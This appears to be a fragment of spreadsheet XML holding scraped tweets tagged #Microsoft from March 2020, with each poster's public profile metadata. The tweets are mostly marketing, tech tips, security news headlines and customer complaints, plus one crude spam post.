    <t>{'id': 15242546, 'id_str': '15242546', 'name': 'PDMS', 'screen_name': 'PDMS', 'location': 'Isle of Man / London / Glasgow', 'description': 'PDMS is a software development company specialising in the development of web based business systems for a wide range of markets. Member of UK Cloud Alliance.', 'url': 'http://t.co/eL5aFuQHwh', 'entities': {'url': {'urls': [{'url': 'http://t.co/eL5aFuQHwh', 'expanded_url': 'http://pdms.com', 'display_url': 'pdms.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1283, 'friends_count': 256, 'listed_count': 28, 'created_at': 'Thu Jun 26 10:09:17 +0000 2008', 'favourites_count': 507, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1728, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CEEBEE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/924938248685842432/VIF0Ho-4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/924938248685842432/VIF0Ho-4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15242546/1549361737', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'EEF9FE', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 11:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Healthcare organizations looking to drive change in their health ecosystem have turned to #Microsoft and its vast partner ecosystem to help them transform. https://t.co/OJKEoGUn7E</t>
  </si>
  <si>
    <t>Wed Mar 04 11:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#Ajilius finds sweet spot between open source affordability and enterprise-grade features - #Microsoft #Azure #SQL #Australia https://t.co/Mhv7Ke6Cim #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 10:55:40 +0000 2020</t>
  </si>
  <si>
    <t>On this weeks podcast we take a look at Modernisation in a show recorded at #MicrosoftIgnite Tour in London I chat with @mcbride_ruairi &amp;amp; @jabendicic about applications, datacentres and how #Microsoft tech is helping drive change -... https://t.co/5wsa9hm0r7 https://t.co/3zDkzV65rN</t>
  </si>
  <si>
    <t>Wed Mar 04 10:55:06 +0000 2020</t>
  </si>
  <si>
    <t>#PPC brand protection done the right way https://t.co/24NdRViZw7 #GoogleAds #Microsoft Advertising</t>
  </si>
  <si>
    <t>Wed Mar 04 10:49:42 +0000 2020</t>
  </si>
  <si>
    <t>(Post-98)  buy 
Microsoft Xbox One Wireless Controller with Bluetooth (With 3.5 mm Jack) (White)
At just Rs. 4,300 [14%Off]
Click here to buy  
https://t.co/5YrLkXYjgA
#Microsoft #MicrosoftStore #MicrosoftXbox #games #bluetooth #onlineshopping #trendingfashion https://t.co/bcSnahVeyc</t>
  </si>
  <si>
    <t>{'id': 1216344753366634497, 'id_str': '1216344753366634497', 'name': 'Trending fashion', 'screen_name': 't_fashion_', 'location': 'à¤­à¤¾à¤°à¤¤', 'description': "what's in fashion you can find here ðŸ˜‰ðŸ”¥", 'url': 'https://t.co/QQI1wx0ETe', 'entities': {'url': {'urls': [{'url': 'https://t.co/QQI1wx0ETe', 'expanded_url': 'http://Sjveerwal.blogspot.com', 'display_url': 'Sjveerwal.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sun Jan 12 13:03:06 +0000 2020', 'favourites_count': 82, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1218953728868470785/KO1P81l6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218953728868470785/KO1P81l6_normal.jpg',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</si>
  <si>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10:49:02 +0000 2020</t>
  </si>
  <si>
    <t>.@Google #microsoft @SamsungMobile 
#flaw #window10 
I keep trying to change permissions for it to revert to @Google, but it keeps reverting to @Microsoft!
Please advise. I have the the #GalaxyNote9 #Android10
 #TechSupport #WomenInSTEM #GirlsWhoCode #WednesdayThoughts https://t.co/tZcnHlZncL</t>
  </si>
  <si>
    <t>Wed Mar 04 10:46:11 +0000 2020</t>
  </si>
  <si>
    <t>#Exchange Shell - Get all shared mailboxes with primary #SMTP - https://t.co/yBDXTknwul #Guide #Microsoft #Powershell #IT #techblogger #mblogger #techygeekshome</t>
  </si>
  <si>
    <t>{'id': 1058058955, 'id_str': '1058058955', 'name': 'A.J. Armstrong @ TechyGeeksHome', 'screen_name': 'TechyGeeks1', 'location': 'UK', 'description': 'ðŸ‘¨ðŸ¼\u200dðŸ’» Tech Blogger ðŸ–Šï¸\nðŸ’» IT Pro ðŸ–¥ï¸\nâš½ Lifelong AVFC fan âš½', 'url': 'https://t.co/oEtWKndEFC', 'entities': {'url': {'urls': [{'url': 'https://t.co/oEtWKndEFC', 'expanded_url': 'https://blog.techygeekshome.info', 'display_url': 'blog.techygeekshome.info', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1966, 'friends_count': 99, 'listed_count': 424, 'created_at': 'Thu Jan 03 15:25:32 +0000 2013', 'favourites_count': 125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9257,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'http://pbs.twimg.com/profile_images/1101985666169221120/WQ1yy-PU_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101985666169221120/WQ1yy-PU_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1058058955/1530569832',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</si>
  <si>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10:41:35 +0000 2020</t>
  </si>
  <si>
    <t>I do not often fuck in a tender ass. Painfully #Fort Worth   #fishing #microsoft https://t.co/uTG0gryp8t</t>
  </si>
  <si>
    <t>{'id': 1235006898887417856, 'id_str': '1235006898887417856', 'name': 'Melinda Gamble', 'screen_name': 'gautedcessde', 'location': 'Little Rock, USA', 'description': 'You may hold my hand for a while, but you hold my heart forever.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Wed Mar 04 00:59:30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'http://pbs.twimg.com/profile_images/1235026963150131200/rdXiBhIV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235026963150131200/rdXiBhIV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235006898887417856/1583288377',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</si>
  <si>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10:41:22 +0000 2020</t>
  </si>
  <si>
    <t>"AI-driven personalisation is poised to drive $94 billion in value to the retail market in the next decade" 
A quick overview from our partner Microsoft on the importance of AI in retail and the expectations customers have around personalisation. 
#microsoft #retailtech https://t.co/EReFItQIz5</t>
  </si>
  <si>
    <t>{'id': 3957894813, 'id_str': '3957894813', 'name': 'Intouch.com', 'screen_name': 'intouchHQ', 'location': 'Dublin City, Ireland', 'description': 'AI-Powered platform for retailers to intelligently target shoppers with personalized offerings in-store.', 'url': 'https://t.co/8n1VaVRTej', 'entities': {'url': {'urls': [{'url': 'https://t.co/8n1VaVRTej', 'expanded_url': 'http://www.intouch.com', 'display_url': 'intouch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1374, 'friends_count': 715, 'listed_count': 164, 'created_at': 'Wed Oct 14 17:59:29 +0000 2015', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 350,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'http://pbs.twimg.com/profile_images/1134106223379456000/kPGOLPec_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134106223379456000/kPGOLPec_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3957894813/1561541426',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</si>
  <si>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10:41:00 +0000 2020</t>
  </si>
  <si>
    <t>Here are your #top10 reasons why switching to #Office365 will make a difference to you, your business &amp;amp; your team
https://t.co/zNQU71feLl
Call us today on 0191 214 1750 because #wemakeithappen #Microsoft #solutions #anytime https://t.co/fM5vs6x4H3</t>
  </si>
  <si>
    <t>{'id': 420332138, 'id_str': '420332138', 'name': 'Bowe Digital', 'screen_name': 'Bowe_Digital', 'location': 'Newcastle Upon Tyne, England', 'description': 'Bowe -fast, friendly and there when you need us! An IT Partner for your business; hardware, software, IT support, networking &amp; phone systems. We make IT happen!', 'url': 'http://t.co/ZQC1sjo5cD', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZQC1sjo5cD', 'expanded_url': 'http://www.bowe.co.uk', 'display_url': 'bowe.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3579, 'friends_count': 2210, 'listed_count': 63, 'created_at': 'Thu Nov 24 13:49:27 +0000 2011', 'favourites_count': 1609, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7555,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'http://pbs.twimg.com/profile_images/1105419676274839552/s0b_KIJo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105419676274839552/s0b_KIJo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/420332138/1552387379', 'profile_link_color': '35B821', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'C5FACB', 'profile_text_color': '050505', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 10:38:40 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations #microsoft billing. 7 days &amp;amp; no contact. Your #incompetence has waited out the pre-order release so no refund is possible. If this was #amazon, it would have been sorted in 1 call or email. #shameful #fail #preorder #Xbox #xboxsupport #xboxlive #badcustomerservice</t>
  </si>
  <si>
    <t>{'id': 621224695, 'id_str': '621224695', 'name': 'MrED', 'screen_name': 'mrederwee', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Thu Jun 28 18:54:09 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1138202453172772864/uR4mTwCH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138202453172772864/uR4mTwCH_normal.png',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</si>
  <si>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10:35:09 +0000 2020</t>
  </si>
  <si>
    <t>Former #Microsoft engineer used his admin privileges to steal $10m. https://t.co/yHIHI4pIDt Insiders represent a significant #security risk. Trusted Cloud #CyberSecurity detects all mistakes / malicious activities by insiders in seconds! https://t.co/8tOnVy8HYO #InsiderThreat https://t.co/eS3PZuZHpK</t>
  </si>
  <si>
    <t>{'id': 1013810040787136512, 'id_str': '1013810040787136512', 'name': 'CyberHiveUK', 'screen_name': 'CyberHiveGlobal', 'location': 'South East, England', 'description': 'Changing the Cyber Security landscape and providing a truly secure IaaS solution. #Cyber #Security #Cloud #Secure #TrustedCloud', 'url': 'https://t.co/Mn2d3RRFtS', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mn2d3RRFtS', 'expanded_url': 'http://www.cyberhive.com', 'display_url': 'cyberhive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 113, 'friends_count': 322, 'listed_count': 0, 'created_at': 'Mon Jul 02 15:42:04 +0000 2018', 'favourites_count': 256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 360,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'http://pbs.twimg.com/profile_images/1226903294230044672/Jtwm_z8n_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226903294230044672/Jtwm_z8n_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1013810040787136512/1581375371',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</si>
  <si>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10:31:16 +0000 2020</t>
  </si>
  <si>
    <t>BREAKING NEWS: #Microsoft is retiring 18 certifications and 43 exams in #SQL Server, Windows Server, App Builder, Web Applications and more on 30 June 2020. Our article will tell you what you need to know https://t.co/ZYZqftbnmZ https://t.co/VCjm0VFqdn</t>
  </si>
  <si>
    <t>Wed Mar 04 10:29:00 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to configure Metacache Database, a new feature of #Microsoft #Exchange 2019, with this #HPE blog at https://t.co/daLGP1TxFH  
#HPEApollo #DataAnalytics #AI #ML #Cloud @MSFTExchange @TiberGreg  @DaveRndn @TechyGeeks1 https://t.co/pcd2UTSnFP</t>
  </si>
  <si>
    <t>Wed Mar 04 10:27:33 +0000 2020</t>
  </si>
  <si>
    <t>Operations PRO for a two day crash course on Microsoft Excel and learn all the essentials including advanced tips, tricks, shortcuts, functions &amp;amp; formulas.
Enroll now: https://t.co/xpVH2YSfdu
#msexcel #msexceltraing #msexcelshortcourse #Microsoft #skills #careers #excel #jobs https://t.co/4jFPytDDox</t>
  </si>
  <si>
    <t>{'id': 1233351305487437825, 'id_str': '1233351305487437825', 'name': 'Operationspro.pk', 'screen_name': 'OperationsproPk', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Fri Feb 28 11:21:00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</si>
  <si>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Mar 04 10:26:38 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Audit Log is broken in new german region! Second new tenant in that region now where O365 audit log does not work.  #microsoft support is on it since 3 weeks now, but no solution until yet ... #Microsoft365 @Office365_Tech @OfficeSupport https://t.co/cPCNeyAy0W</t>
  </si>
  <si>
    <t>{'id': 46351799, 'id_str': '46351799', 'name': 'Andreas HÃ¶tzinger', 'screen_name': 'ahoetzing', 'location': 'Deggendorf, Bavaria, Germany', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 64, 'listed_count': 1, 'created_at': 'Thu Jun 11 09:19:42 +0000 2009', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1235146232030470144/Ds5bLrrQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235146232030470144/Ds5bLrrQ_normal.jpg',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</si>
  <si>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10:22:32 +0000 2020</t>
  </si>
  <si>
    <t>An amazing session from Umar Bari from #Microsoft on the the power of #data and how #customerinsights can increase not only your customers loyalty, but also profit.
We can not be more happy and privileged to have you, Umar.
#DynamicsForum @inc_group_uk  #Incremental https://t.co/Thf4UX7r5R</t>
  </si>
  <si>
    <t>{'id': 1172125798637166593, 'id_str': '1172125798637166593', 'name': 'Dilyana Radulova', 'screen_name': 'DilyanaRadulova', 'location': 'Glasgow', 'description': 'Microsoft Certified Solutions Expert and experienced Technical CE Consultant. Passionate about #D365Marketing and #taekwondo.', 'url': 'https://t.co/vjF853jN1A', 'entities': {'url': {'urls': [{'url': 'https://t.co/vjF853jN1A', 'expanded_url': 'http://dilyanaradulova.com/', 'display_url': 'dilyanaradulova.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 189, 'friends_count': 149, 'listed_count': 4, 'created_at': 'Thu Sep 12 12:32:47 +0000 2019', 'favourites_count': 357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 318, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1172126025834217472/r-umdr0b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172126025834217472/r-umdr0b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1172125798637166593/1572610454',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</si>
  <si>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10:18:10 +0000 2020</t>
  </si>
  <si>
    <t>@KennyBirge @ItagakiScarlett I love it and I hate it. I love the concept and would like to use it but I hate it because Xbox, specially Microsoft DOES. NOT. LISTEN. TO. SMALL. COUNTRIES.
#Xbox #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1168548427204050944, 'id_str': '1168548427204050944', 'name': 'Jo', 'screen_name': 'JoAnacondas', 'location': 'Earth 1', 'description': 'I love gaming and my One X', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 181, 'listed_count': 0, 'created_at': 'Mon Sep 02 15:37:27 +0000 2019', 'favourites_count': 7059, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 959, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235666728107073536/3E34XlT-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235666728107073536/3E34XlT-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1168548427204050944/1579068405',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</si>
  <si>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10:14:15 +0000 2020</t>
  </si>
  <si>
    <t>Interesting article on how to migrate your Azure Large Instances to Virtual Machines. 
#sap #saponazure #publiccloud #microsoft #expertum
https://t.co/FCHSqXe2F5</t>
  </si>
  <si>
    <t>{'id': 230181571, 'id_str': '230181571', 'name': 'Bert Vanstechelman', 'screen_name': 'bertvanstech', 'location': 'Belgium', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 85, 'listed_count': 4, 'created_at': 'Fri Dec 24 14:30:31 +0000 2010', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 192,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'http://pbs.twimg.com/profile_images/2412615971/mjma0dhs0w6btxfmcq6r_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2412615971/mjma0dhs0w6btxfmcq6r_normal.jpeg',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</si>
  <si>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10:14:01 +0000 2020</t>
  </si>
  <si>
    <t>What do #Microsoft, #IBM, and the #CatholicChurch have in common?
They all want #AI to be ethical.
#ArtificialIntelligence #TheRomeCallForEthics
https://t.co/v7tNdT5DvJ https://t.co/pD62jBvo9N</t>
  </si>
  <si>
    <t>{'id': 1095254569578348544, 'id_str': '1095254569578348544', 'name': 'Amy Stokes-Waters', 'screen_name': 'identity_amy', 'location': 'Leeds, England', 'description': 'Microsoft Security Specialist. Cloud first. Licencing guru. Mum to one whirlwind.', 'url': 'https://t.co/M4T2z8oHwz', 'entities': {'url': {'urls': [{'url': 'https://t.co/M4T2z8oHwz', 'expanded_url': 'http://www.identityexperts.co.uk', 'display_url': 'identityexperts.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 66, 'listed_count': 0, 'created_at': 'Tue Feb 12 09:33:33 +0000 2019', 'favourites_count': 253, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 164,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'http://pbs.twimg.com/profile_images/1095254631515590656/augAE9rK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095254631515590656/augAE9rK_normal.jpg',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</si>
  <si>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10:13:13 +0000 2020</t>
  </si>
  <si>
    <t>QUESTION for @bytemaster7 and @BrendanBlumer .
Is #EOS going into the #manufacturing of #newgen #laptop and #PC with #blockchain #tech capabilities using the #Daps running on EOS????
#IBM #Nokia #HTC #Apple #Microsoft https://t.co/7njC128PSp</t>
  </si>
  <si>
    <t>{'id': 847857097689759746, 'id_str': '847857097689759746', 'name': 'CryptoAmigo', 'screen_name': 'CryptoAmigo', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 164, 'listed_count': 0, 'created_at': 'Fri Mar 31 17:04:19 +0000 2017', 'favourites_count': 714, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 290, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/853658136506494976/y6B1mkpj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/853658136506494976/y6B1mkpj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/847857097689759746/1492363007',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</si>
  <si>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10:13:03 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">  #customerinsights is the tool. 
  Customer loyalty is the aim.
   @inc_group_uk associate #data scientist Moreno Vardanega and #Microsoft  Umar Bari session today is the journey.
#DynamicsForum https://t.co/iWQWyQOonX</t>
  </si>
  <si>
    <t>Wed Mar 04 10:11:54 +0000 2020</t>
  </si>
  <si>
    <t>After setting up #Outlook for #Windows maybe your older messages arent showing up quickly? That might be because of a hidden default set by #Microsoft which no longer appears as an account setup option. #Office365 #Office2019 https://t.co/B97QuXEO42</t>
  </si>
  <si>
    <t>{'id': 19955431, 'id_str': '19955431', 'name': 'Office Watch', 'screen_name': 'OfficeWatch', 'location': 'Global', 'description': 'http://t.co/hMUdEO4sZC - Your independent source of Microsoft Office, Word, Outlook, Excel, Powerpoint news, tips and advice since 1996', 'url': 'http://t.co/6TKa3D9xhd', 'entities': {'url': {'urls': [{'url': 'http://t.co/6TKa3D9xhd', 'expanded_url': 'http://office-watch.com', 'display_url': 'office-watch.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/hMUdEO4sZC', 'expanded_url': 'http://Office-Watch.com', 'display_url': 'Office-Watch.com', 'indices': [0, 22]}]}}, 'protected': False, 'followers_count': 934, 'friends_count': 456, 'listed_count': 57, 'created_at': 'Tue Feb 03 05:05:16 +0000 2009', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3047,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'http://pbs.twimg.com/profile_images/821711538998259713/WwemvZvI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/821711538998259713/WwemvZvI_normal.jpg',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</si>
  <si>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10:09:42 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/MuEsoW1XaC Ranked Top #Microsoft #Azure #Blog to Follow in 2020
 #Top20
https://t.co/2gbRxYIvOo</t>
  </si>
  <si>
    <t>Wed Mar 04 10:03:00 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Backup For Dummies -- https://t.co/z7EjXf7nyl #Microsoft #IT https://t.co/fksgklwhib</t>
  </si>
  <si>
    <t>{'id': 713699873414127617, 'id_str': '713699873414127617', 'name': 'SwissSharePoint News', 'screen_name': 'SharePointSwiss', 'location': 'GenÃ¨ve, Suisse', 'description': '#SharePoint, #Office365, #O365, #Azure', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3550, 'friends_count': 3361, 'listed_count': 480, 'created_at': 'Sat Mar 26 12:11:24 +0000 2016', 'favourites_count': 1275, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16739, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/713743666825797633/HzKvP39x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/713743666825797633/HzKvP39x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/713699873414127617/1459004747',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</si>
  <si>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10:01:26 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for todays FREE webinar and see what you need to do in the next 3 months to protect and backup your Office 365 data! #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/Bo0t7YIwRv</t>
  </si>
  <si>
    <t>{'id': 37898411, 'id_str': '37898411', 'name': 'Digital Transformation EXPO Event Series', 'screen_name': 'DTXseries', 'location': 'Manchester', 'description': 'Demystifying Technology for Business \n2020\nManchester: 25-26Mar\nLondon: 30Sep-1Oct\n#DTXmcr', 'url': 'https://t.co/qgZajO9bFh', 'entities': {'url': {'urls': [{'url': 'https://t.co/qgZajO9bFh', 'expanded_url': 'https://dt-x.io/manchester/en/page/dtx-manchester', 'display_url': 'dt-x.io/manchester/en/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11536, 'friends_count': 4666, 'listed_count': 372, 'created_at': 'Tue May 05 10:38:42 +0000 2009', 'favourites_count': 2686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12047,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'http://pbs.twimg.com/profile_images/1197817418682421248/VLNqVPJT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197817418682421248/VLNqVPJT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37898411/1574416902', 'profile_link_color': '008ABE',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</si>
  <si>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10:00:59 +0000 2020</t>
  </si>
  <si>
    <t>Grow your business with training from ADNS.
We offer Microsoft, security and organisational training to help improve employee performance.
Call today and book your training seminar at 01642 248 750 
#ADNS #Training #Microsoft https://t.co/1ppL114JPv</t>
  </si>
  <si>
    <t>{'id': 216290650, 'id_str': '216290650', 'name': 'ADNS Group', 'screen_name': 'adnetworksol', 'location': 'Middlesbrough', 'description': 'Providing IT, Communication, Network &amp; Security solutions designed specifically for your business. Call now to book a free audit of your system on 0162 248 750.', 'url': 'https://t.co/tf4HtN5aVf', 'entities': {'url': {'urls': [{'url': 'https://t.co/tf4HtN5aVf', 'expanded_url': 'http://www.adnsgroup.com', 'display_url': 'adnsgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1260, 'friends_count': 1433, 'listed_count': 30, 'created_at': 'Tue Nov 16 08:48:21 +0000 2010', 'favourites_count': 182, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2650,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'http://pbs.twimg.com/profile_images/895312049596760064/frwQbMmB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895312049596760064/frwQbMmB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/216290650/1556013571', 'profile_link_color': '00338C',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</si>
  <si>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10:00:34 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive for Business is a central hub for all your files. Upload, organise, and easily share documents with others, both inside and outside of your organisation. 
Talk to us for all your business tech needs: https://t.co/fAP0vYMfhi
#Technology #Microsoft #IT #Telecoms #Tech https://t.co/iNLF253D7H</t>
  </si>
  <si>
    <t>{'id': 353669958, 'id_str': '353669958', 'name': 'Agora Tec', 'screen_name': 'agoratecsa', 'location': 'Hyde Park, South Africa', 'description': 'Communications Provider. Always willing to share the latest technology news, tips, tricks and the best deals on the market.', 'url': 'http://t.co/tHdJXueWZw', 'entities': {'url': {'urls': [{'url': 'http://t.co/tHdJXueWZw', 'expanded_url': 'http://www.smartcom.co.za', 'display_url': 'smartcom.co.za', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 795, 'friends_count': 535, 'listed_count': 3, 'created_at': 'Fri Aug 12 13:14:21 +0000 2011', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2310,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'http://pbs.twimg.com/profile_images/1224611857241137156/p5o5mTlF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224611857241137156/p5o5mTlF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/353669958/1580807017',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</si>
  <si>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10:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Re: Defense in depth -- the #Microsoft way (part 62): #Windows shipped with end-of-life components https://t.co/8Q3CRXC3sd #FullDisclosure</t>
  </si>
  <si>
    <t>Wed Mar 04 09:58:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has deleted Facebook App from Windows 10 Store #BadMove</t>
  </si>
  <si>
    <t>{'id': 228542293, 'id_str': '228542293', 'name': 'AndyOD81', 'screen_name': 'sexyandy81', 'location': 'On planet earth', 'description': "If it don't look broken then don't fix it.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 120, 'listed_count': 0, 'created_at': 'Mon Dec 20 01:24:18 +0000 2010', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 528,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'http://pbs.twimg.com/profile_images/523849131396059137/efvspiTt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/523849131396059137/efvspiTt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/228542293/1413730351',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</si>
  <si>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09:58:03 +0000 2020</t>
  </si>
  <si>
    <t>How do you secure corporate #data whilst maintaining user experience and personal data privacy? 
Check out our #blog about multi-identity management to find out how #Intune lets you enjoy the best of both worlds.
#Microsoft #MicrosoftIntune #BYOD
https://t.co/rG1Rvg28WM https://t.co/ZPze9zskTo</t>
  </si>
  <si>
